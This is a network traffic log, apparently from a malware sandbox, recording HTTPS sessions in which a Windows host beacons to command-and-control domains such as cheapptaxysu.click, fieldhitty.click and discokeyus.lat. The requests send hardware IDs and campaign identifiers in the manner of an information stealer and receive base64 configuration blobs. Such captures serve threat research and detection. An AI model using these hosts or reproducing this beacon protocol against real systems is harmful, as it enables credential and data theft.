2024-12-22 01:18:57 UTC	1130	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r3e8bj05kcg91nstppga3g83ev; expires=Wed, 16 Apr 2025 19:05:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sRAXG%2Fm3aFYpzf7hPI2PR3wn0YJneSfHyHboW1sjDX2ibq5iuuPxEMvkL1KavKTI%2FiDfg2pncLQDPcZKVNxxeLyh7BJhCzC4f2Vp1oW%2FplGjJfD9xlVouYimkwOPrYliBg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47e43dedc411-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1597&rtt_var=624&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21362&delivery_rate=1720683&cwnd=224&unsent_bytes=0&cid=f29c49ecce9051e7&ts=1012&x=0"
2024-12-22 01:18:57 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	50247	104.21.67.146	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:56 UTC	355	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 50 Host: cheapptaxysu.click
2024-12-22 01:18:56 UTC	50	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=CZJvss--geopoxid&j=
2024-12-22 01:18:57 UTC	1134	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4qo7tv5gkrnc8dm58r8qljn8gl; expires=Wed, 16 Apr 2025 19:05:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=49L%2BIPnHiOr2rUIVuSHHPGqYR7VOmUSU5x%2BJWLDP%2FpsOXdUuzqm%2Fmqmjjd1NPeP7qMyzFPZGwG1eBX78SIANp13NyeBUSSvteop8bWu3eiRNKl4YB%2FS5mUnoAJEwnMM5NgdY%2B9Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47e51a75de92-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1489&rtt_var=559&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1041&delivery_rate=1954484&cwnd=245&unsent_bytes=0&cid=2e63359e3c3782e9&ts=771&x=0"
2024-12-22 01:18:57 UTC	235	IN	Data Raw: 32 64 32 66 0d 0a 57 41 6c 54 5a 33 2f 74 61 69 70 49 78 69 58 43 6f 42 48 56 4a 61 52 7a 39 64 6b 74 6f 6f 78 49 72 34 68 6f 6c 48 4e 61 78 32 59 6a 4b 79 56 46 52 64 6c 47 43 44 75 6a 42 2f 6a 55 59 36 42 41 69 46 47 55 76 51 2b 59 36 69 6e 44 2b 77 32 34 55 53 79 71 52 47 4a 76 4d 67 73 4d 69 45 59 49 4c 62 34 48 2b 50 74 71 39 30 44 4b 55 63 2f 37 53 4d 6a 75 4b 63 50 71 43 66 38 63 4b 71 73 46 4d 47 55 30 44 78 71 4f 44 6b 73 6b 71 30 43 6e 78 58 43 2f 53 38 30 65 6e 62 51 50 6a 71 34 74 31 61 70 53 74 6a 34 2f 73 77 63 56 61 43 41 4d 58 5a 42 47 55 57 71 6a 53 2b 43 61 4d 37 52 41 78 68 2b 54 76 55 62 4b 35 43 44 4c 36 77 7a 2b 41 7a 4f 68 44 6a 42 72 4e 77 34 51 68 78 70 47 4c 71 78 4c 6f Data Ascii: 2d2fWAlTZ3/taipIxiXCoBHVJaRz9dktooxIr4holHNax2YjKyVFRdlGCDujB/jUY6BAiFGUvQ+Y6inD+w24USyqRGJvMgsMiEYILb4H+Ptq90DKUc/7SMjuKcPqCf8cKqsFMGU0DxqODkskq0CnxXC/S80enbQPjq4t1apStj4/swcVaCAMXZBGUWqjS+CaM7RAxh+TvUbK5CDL6wz+AzOhDjBrNw4QhxpGLqxLo
2024-12-22 01:18:57 UTC	1369	IN	Data Raw: 63 39 77 39 77 6d 47 46 6f 2f 37 46 34 43 39 47 4d 37 37 47 2b 4d 63 4b 4b 4e 45 4a 53 55 6f 52 52 71 44 53 42 42 71 72 45 75 75 78 33 43 34 51 4d 63 52 68 62 52 50 77 2b 59 69 79 65 41 46 2b 52 34 32 72 77 4d 79 59 6a 59 4b 47 6f 63 4f 52 79 6e 6b 43 65 44 46 61 2f 63 66 68 6a 47 48 75 45 7a 55 34 7a 75 4e 39 55 54 76 55 54 2b 70 52 47 49 72 4e 77 73 63 67 67 68 61 49 71 39 4d 70 64 42 34 76 6b 72 4c 45 5a 71 78 51 4d 50 75 4c 63 66 67 42 66 77 56 4e 61 67 43 4f 6d 74 78 53 31 32 49 45 41 68 79 35 47 53 6c 30 6e 53 37 55 59 51 72 31 36 51 42 32 61 34 74 77 61 70 53 74 68 6b 39 70 67 63 78 5a 44 49 4e 46 70 30 49 57 69 79 70 51 72 4c 45 64 72 6c 4e 78 51 4f 64 74 55 6e 44 35 79 48 45 37 77 33 79 55 58 62 6c 41 79 49 72 61 55 55 38 67 67 4e 45 49 4c 4e 48 Data Ascii: c9w9wmGFo/7F4C9GM77G+McKKNEJSUoRRqDSBBqrEuux3C4QMcRhbRPw+YiyeAF+R42rwMyYjYKGocORynkCeDFa/cfhjGHuEzU4zuN9UTvUT+pRGIrNwscgghaIq9MpdB4vkrLEZqxQMPuLcfgBfwVNagCOmtxS12IEAhy5GSl0nS7UYQr16QB2a4twapSthk9pgcxZDINFp0IWiypQrLEdrlNxQOdtUnD5yHE7w3yUXblAyIraUU8ggNEILNH
2024-12-22 01:18:57 UTC	1369	IN	Data Raw: 56 48 79 67 4f 62 73 55 6e 50 34 79 61 4e 70 45 72 78 43 58 6a 39 52 42 42 6f 4a 51 59 58 7a 54 31 4c 4a 4b 70 41 74 6f 4a 73 2b 56 36 47 46 70 76 37 46 34 44 6a 4b 38 58 73 47 50 6b 63 4f 36 73 4b 4e 57 34 2b 44 52 32 50 42 55 30 75 72 30 79 6a 7a 33 65 6c 54 63 59 5a 6b 72 70 46 79 71 35 6b 6a 65 30 53 74 6b 6c 34 6c 42 4d 78 4b 51 51 47 45 34 45 50 58 6d 71 37 43 62 6d 43 64 4c 73 48 6e 6c 47 61 73 30 72 46 34 53 76 48 35 41 2f 38 48 54 43 72 42 79 68 6b 4e 51 55 52 68 77 4a 46 4a 4b 42 50 71 63 6c 34 73 55 66 48 47 39 66 31 44 38 66 32 61 70 57 71 50 76 45 64 4e 61 70 47 44 32 67 2f 43 78 71 5a 53 46 64 6b 76 51 65 6e 7a 6a 50 76 42 38 6f 59 6c 37 42 46 78 4f 34 74 77 4f 38 4a 38 52 49 31 6f 67 34 30 62 44 55 4a 46 49 49 4f 53 43 32 67 51 72 4c 48 65 Data Ascii: VHygObsUnP4yaNpErxCXj9RBBoJQYXzT1LJKpAtoJs+V6GFpv7F4DjK8XsGPkcO6sKNW4+DR2PBU0ur0yjz3elTcYZkrpFyq5kje0Stkl4lBMxKQQGE4EPXmq7CbmCdLsHnlGas0rF4SvH5A/8HTCrByhkNQURhwJFJKBPqcl4sUfHG9f1D8f2apWqPvEdNapGD2g/CxqZSFdkvQenzjPvB8oYl7BFxO4twO8J8RI1og40bDUJFIIOSC2gQrLHe
2024-12-22 01:18:57 UTC	1369	IN	Data Raw: 6b 6d 61 30 50 33 36 41 7a 6a 65 30 47 74 6b 6c 34 72 41 30 6f 5a 54 38 4d 45 49 6b 41 54 79 53 70 54 4b 62 4a 64 4c 42 42 79 78 6d 61 76 6b 7a 42 36 69 44 66 36 51 48 38 48 44 4c 6c 53 6e 70 73 4b 55 56 46 7a 79 39 45 41 37 52 63 73 74 51 7a 71 41 6e 66 55 5a 43 33 44 35 69 75 4b 63 4c 6a 42 66 34 5a 4e 36 6f 41 4e 47 30 33 43 42 69 41 41 6c 6f 69 71 6b 71 72 7a 58 69 6c 52 38 73 56 6d 37 39 48 79 2b 52 71 67 36 6f 4e 37 6c 46 67 35 54 45 33 5a 44 45 47 43 38 38 58 42 6a 50 6b 51 4b 79 43 4b 2f 64 4c 79 42 47 59 74 30 50 4c 35 69 76 42 35 41 33 7a 47 44 43 74 46 6a 74 76 4f 51 51 54 67 41 6c 4d 4c 36 46 44 70 38 5a 31 75 41 65 49 55 5a 43 6a 44 35 69 75 42 65 72 66 53 4e 63 72 65 4c 70 4b 49 79 73 32 43 56 33 58 53 45 51 70 71 45 2b 76 78 48 71 37 54 63 Data Ascii: kma0P36Azje0Gtkl4rA0oZT8MEIkATySpTKbJdLBByxmavkzB6iDf6QH8HDLlSnpsKUVFzy9EA7RcstQzqAnfUZC3D5iuKcLjBf4ZN6oANG03CBiAAloiqkqrzXilR8sVm79Hy+Rqg6oN7lFg5TE3ZDEGC88XBjPkQKyCK/dLyBGYt0PL5ivB5A3zGDCtFjtvOQQTgAlML6FDp8Z1uAeIUZCjD5iuBerfSNcreLpKIys2CV3XSEQpqE+vxHq7Tc
2024-12-22 01:18:57 UTC	1369	IN	Data Raw: 52 4d 54 74 4c 73 6a 6c 43 2f 63 58 4b 71 49 4e 4b 47 55 38 43 68 57 48 41 55 6b 75 6f 55 71 6d 7a 6e 6d 32 51 4d 67 66 6e 2f 73 42 67 4f 6b 79 6a 62 4a 4b 31 77 45 6a 74 78 49 33 53 6a 77 4b 58 5a 42 47 55 57 71 6a 53 2b 43 61 4d 37 35 56 77 68 79 46 73 6b 6a 4f 34 53 6e 66 36 77 66 39 41 7a 2b 71 41 44 31 6e 4e 77 6f 62 6a 67 31 43 4a 71 4e 43 71 38 31 2f 39 77 6d 47 46 6f 2f 37 46 34 44 41 49 64 37 39 43 66 67 61 4c 72 35 45 4a 53 55 6f 52 52 71 44 53 42 42 71 70 30 79 72 78 6e 4f 37 52 38 49 63 6c 36 6c 41 78 2b 6b 6a 78 76 67 41 38 52 59 7a 72 51 38 31 62 53 4d 4a 45 35 30 4e 57 6a 6a 6b 43 65 44 46 61 2f 63 66 68 69 65 51 71 31 2f 44 72 42 76 62 36 52 7a 39 48 44 54 6c 47 33 52 79 63 51 49 52 7a 31 41 49 4c 4b 74 4f 6f 38 31 79 76 6b 76 4c 46 4a 36 Data Ascii: RMTtLsjlC/cXKqINKGU8ChWHAUkuoUqmznm2QMgfn/sBgOkyjbJK1wEjtxI3SjwKXZBGUWqjS+CaM75VwhyFskjO4Snf6wf9Az+qAD1nNwobjg1CJqNCq81/9wmGFo/7F4DAId79CfgaLr5EJSUoRRqDSBBqp0yrxnO7R8Icl6lAx+kjxvgA8RYzrQ81bSMJE50NWjjkCeDFa/cfhieQq1/DrBvb6Rz9HDTlG3RycQIRz1AILKtOo81yvkvLFJ6
2024-12-22 01:18:57 UTC	1369	IN	Data Raw: 69 48 44 32 41 6e 74 55 53 66 72 48 58 70 73 50 55 56 46 7a 77 74 50 4b 61 56 4e 71 63 35 38 73 45 50 55 47 35 43 70 54 73 48 6c 4a 38 48 71 42 2f 73 62 4f 61 77 4a 4e 6d 59 32 41 68 4b 4b 53 41 5a 71 6f 31 2f 67 6d 6a 4f 57 53 73 30 64 7a 4f 45 50 33 36 41 7a 6a 65 30 47 74 6b 6c 34 70 51 34 2f 59 54 77 47 45 6f 77 61 53 53 79 32 52 36 33 49 59 62 31 4d 77 78 79 61 74 6b 7a 47 36 43 48 42 2b 41 50 32 45 6a 50 6c 53 6e 70 73 4b 55 56 46 7a 79 74 66 50 4b 35 41 72 4e 52 34 74 6b 54 51 48 49 66 37 41 59 44 2f 4c 64 79 71 55 75 41 42 4c 36 49 62 64 48 4a 78 41 68 48 50 55 41 67 73 72 55 47 6e 78 48 32 6c 51 73 41 65 6d 4c 4a 47 78 4f 59 70 7a 65 34 4f 38 52 51 37 71 51 38 39 61 44 34 42 46 49 45 42 52 32 72 71 42 36 66 61 4d 2b 38 48 35 77 71 55 74 30 4b 41 Data Ascii: iHD2AntUSfrHXpsPUVFzwtPKaVNqc58sEPUG5CpTsHlJ8HqB/sbOawJNmY2AhKKSAZqo1/gmjOWSs0dzOEP36Azje0Gtkl4pQ4/YTwGEowaSSy2R63IYb1MwxyatkzG6CHB+AP2EjPlSnpsKUVFzytfPK5ArNR4tkTQHIf7AYD/LdyqUuABL6IbdHJxAhHPUAgsrUGnxH2lQsAemLJGxOYpze4O8RQ7qQ89aD4BFIEBR2rqB6faM+8H5wqUt0KA
2024-12-22 01:18:57 UTC	1369	IN	Data Raw: 4e 4b 75 46 45 2f 76 55 52 69 4b 78 45 4f 43 34 6f 50 58 6d 69 52 52 4b 37 4d 64 4b 45 48 32 53 37 5a 2b 30 44 61 72 6e 4c 30 38 30 72 78 48 58 6a 39 52 43 39 73 4d 51 49 48 6d 51 39 45 4f 36 39 4b 72 4f 42 38 73 46 48 46 48 70 53 71 52 6f 7a 6c 4a 34 32 6b 53 76 45 4a 65 50 31 45 46 57 77 6e 42 6a 4b 4d 47 55 46 71 36 67 65 6e 31 44 50 76 42 2f 68 52 68 62 68 66 77 2b 45 37 38 36 70 53 37 79 39 34 72 68 49 39 65 7a 49 54 46 6f 49 45 57 52 54 6b 48 2f 53 51 49 65 55 56 6c 41 37 58 70 48 43 4f 72 69 75 4e 73 6a 50 76 55 53 37 6c 58 47 67 6c 63 52 64 64 31 30 67 50 4b 62 5a 56 70 73 46 6c 74 41 44 34 4c 37 43 74 52 63 66 2b 4c 64 72 6c 53 72 68 52 4e 2b 56 63 41 79 73 34 41 67 61 65 48 6b 55 36 6f 77 65 66 6a 44 4f 76 42 35 35 52 6f 72 68 42 7a 75 6b 38 33 Data Ascii: NKuFE/vURiKxEOC4oPXmiRRK7MdKEH2S7Z+0DarnL080rxHXj9RC9sMQIHmQ9EO69KrOB8sFHFHpSqRozlJ42kSvEJeP1EFWwnBjKMGUFq6gen1DPvB/hRhbhfw+E786pS7y94rhI9ezITFoIEWRTkH/SQIeUVlA7XpHCOriuNsjPvUS7lXGglcRdd10gPKbZVpsFltAD4L7CtRcf+LdrlSrhRN+VcAys4AgaeHkU6owefjDOvB55RorhBzuk83
2024-12-22 01:18:57 UTC	1369	IN	Data Raw: 48 4f 2b 49 36 42 47 6f 38 43 6c 47 42 41 30 67 74 74 46 47 37 6a 6e 75 30 58 64 77 76 71 5a 42 44 78 75 6b 77 79 75 77 73 31 6c 46 32 35 51 74 36 4d 77 68 46 56 63 38 33 42 6d 71 38 42 2f 69 43 52 72 52 4a 79 42 61 42 71 67 4c 6f 7a 52 44 33 71 43 62 78 42 48 71 52 41 79 70 36 4f 67 67 52 7a 30 59 49 4c 4f 51 66 38 49 77 7a 73 31 61 47 53 63 66 70 46 4a 57 39 66 5a 32 34 46 62 67 49 65 4c 4e 45 59 6a 6c 2f 52 51 2f 50 55 41 68 74 70 31 57 79 78 48 43 68 52 49 45 76 71 5a 78 42 78 2b 38 38 33 66 30 46 79 43 38 74 70 67 6f 30 62 43 63 55 58 63 46 49 52 32 72 38 66 75 43 4b 4d 34 67 4a 68 67 6e 58 34 77 2f 31 37 53 54 44 37 52 7a 6e 58 42 2b 72 41 7a 74 39 49 52 49 53 7a 30 59 49 4c 4f 51 66 38 6f 77 7a 73 31 61 47 53 63 66 70 46 4a 57 39 66 5a 32 34 46 62 Data Ascii: HO+I6BGo8ClGBA0gttFG7jnu0XdwvqZBDxukwyuws1lF25Qt6MwhFVc83Bmq8B/iCRrRJyBaBqgLozRD3qCbxBHqRAyp6OggRz0YILOQf8Iwzs1aGScfpFJW9fZ24FbgIeLNEYjl/RQ/PUAhtp1WyxHChRIEvqZxBx+883f0FyC8tpgo0bCcUXcFIR2r8fuCKM4gJhgnX4w/17STD7RznXB+rAzt9IRISz0YILOQf8owzs1aGScfpFJW9fZ24Fb
2024-12-22 01:18:57 UTC	1369	IN	Data Raw: 52 68 74 68 49 51 67 53 69 45 70 6f 4c 62 4a 45 34 49 77 7a 75 77 65 65 55 5a 61 78 58 38 33 68 4c 59 48 74 45 50 46 52 64 75 55 4b 65 6a 4e 78 42 42 65 66 42 55 63 74 36 45 47 75 7a 44 4f 6f 43 64 39 52 67 66 73 58 6b 36 42 71 33 36 70 53 74 6c 59 37 74 78 59 38 61 43 63 47 57 72 45 32 5a 54 69 6a 56 36 4f 41 51 72 70 44 30 41 53 55 71 30 6a 2b 30 41 66 66 37 52 72 31 55 77 6d 7a 42 7a 70 6c 4e 6b 56 54 7a 78 41 49 63 75 52 71 73 73 56 6a 74 41 65 49 55 5a 76 37 46 34 44 6a 4f 4d 72 36 43 62 6f 57 49 71 4a 45 4a 53 55 6f 52 51 76 50 55 42 74 6b 35 46 58 67 6d 6a 50 77 53 63 73 51 6c 4c 56 4d 30 76 77 73 7a 76 77 4a 73 53 38 47 69 42 59 39 65 7a 4a 48 4c 49 49 4d 58 6a 2b 6e 56 36 66 38 54 5a 70 56 77 51 47 55 2b 57 50 48 34 79 62 7a 31 44 33 6e 46 69 6a Data Ascii: RhthIQgSiEpoLbJE4IwzuweeUZaxX83hLYHtEPFRduUKejNxBBefBUct6EGuzDOoCd9RgfsXk6Bq36pStlY7txY8aCcGWrE2ZTijV6OAQrpD0ASUq0j+0Aff7Rr1UwmzBzplNkVTzxAIcuRqssVjtAeIUZv7F4DjOMr6CboWIqJEJSUoRQvPUBtk5FXgmjPwScsQlLVM0vwszvwJsS8GiBY9ezJHLIIMXj+nV6f8TZpVwQGU+WPH4ybz1D3nFij

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	50250	104.21.89.115	443	7796	C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:57 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FWBTSPSCKBE0B User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8749 Host: fieldhitty.click
2024-12-22 01:18:57 UTC	8749	OUT	Data Raw: 2d 2d 46 57 42 54 53 50 53 43 4b 42 45 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 46 57 42 54 53 50 53 43 4b 42 45 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 57 42 54 53 50 53 43 4b 42 45 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 46 57 42 54 53 50 53 43 4b 42 45 30 42 0d 0a 43 Data Ascii: --FWBTSPSCKBE0BContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--FWBTSPSCKBE0BContent-Disposition: form-data; name="pid"2--FWBTSPSCKBE0BContent-Disposition: form-data; name="lid"PvbArZ----FWBTSPSCKBE0BC
2024-12-22 01:18:58 UTC	1128	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=89fag7acb5l07lgrikdgfh2vo0; expires=Wed, 16 Apr 2025 19:05:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HPA4l7rGM3pztU9Wv1me1OimTT7Trrvb5uzkbpgD%2Fov%2FF%2B8uZP3GseeOD8oOcP4KA33VG19UV9jV7cuNefBQktI9jECErMaKpFzrMqOLyNZ%2FxDgOx1luBZl%2BQg38z6YsV6i8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47eafa853308-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1823&min_rtt=1808&rtt_var=709&sent=11&recv=14&lost=0&retrans=0&sent_bytes=2838&recv_bytes=9683&delivery_rate=1509824&cwnd=105&unsent_bytes=0&cid=22465f4802852a84&ts=875&x=0"
2024-12-22 01:18:58 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.4	50253	104.21.21.99	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:59 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7GWK31RGYTO8UDAJHY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1401 Host: discokeyus.lat
2024-12-22 01:18:59 UTC	1401	OUT	Data Raw: 2d 2d 37 47 57 4b 33 31 52 47 59 54 4f 38 55 44 41 4a 48 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 47 57 4b 33 31 52 47 59 54 4f 38 55 44 41 4a 48 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 47 57 4b 33 31 52 47 59 54 4f 38 55 44 41 4a 48 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f Data Ascii: --7GWK31RGYTO8UDAJHYContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--7GWK31RGYTO8UDAJHYContent-Disposition: form-data; name="pid"1--7GWK31RGYTO8UDAJHYContent-Disposition: form-data; name="lid"PsFKDg--pablo
2024-12-22 01:18:59 UTC	1136	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bt112gtjo0bvn47a5pc76di93d; expires=Wed, 16 Apr 2025 19:05:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4euVRYNnluiPPb8KEkT%2FUiEmuvTN4YbUD2B%2BhGTEBse1LDVceVpvZYbGFRk6M%2BfTP1r8kQzXFzwj%2BRf4uSgubO6%2BzfXIE5%2BDsjQ6XuGTeKIBend3FS5FGk%2FD7dB6tcK%2B5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47f44b0241c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1709&rtt_var=656&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=2316&delivery_rate=1649717&cwnd=205&unsent_bytes=0&cid=580d30a3f3f0fbf1&ts=682&x=0"
2024-12-22 01:18:59 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.4	50249	172.217.19.228	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:59 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-22 01:19:00 UTC	1018	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 22 Dec 2024 01:19:00 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-22 01:19:00 UTC	372	IN	Data Raw: 37 63 32 0d 0a 29 5d 7d 27 0a 7b 22 64 64 6c 6a 73 6f 6e 22 3a 7b 22 61 63 63 65 73 73 69 62 69 6c 69 74 79 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 61 6c 74 5f 74 65 78 74 22 3a 22 53 65 61 73 6f 6e 61 6c 20 48 6f 6c 69 64 61 79 73 20 32 30 32 34 22 2c 22 64 61 72 6b 5f 64 61 74 61 5f 75 72 69 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 6c 67 41 41 41 44 36 43 41 4d 41 41 41 42 4b 38 38 6b 69 41 41 41 44 41 46 42 4d 56 45 56 48 63 45 79 51 2b 66 2f 2b 73 5a 4c 70 73 4f 44 36 35 4a 50 39 65 77 37 6c 6e 75 6e 39 34 33 62 33 50 6a 72 79 54 45 44 2b 6b 72 54 36 38 33 6e 2f 4f 44 62 39 6c 72 37 2f 4e 6a 50 39 62 49 44 65 6a 76 7a 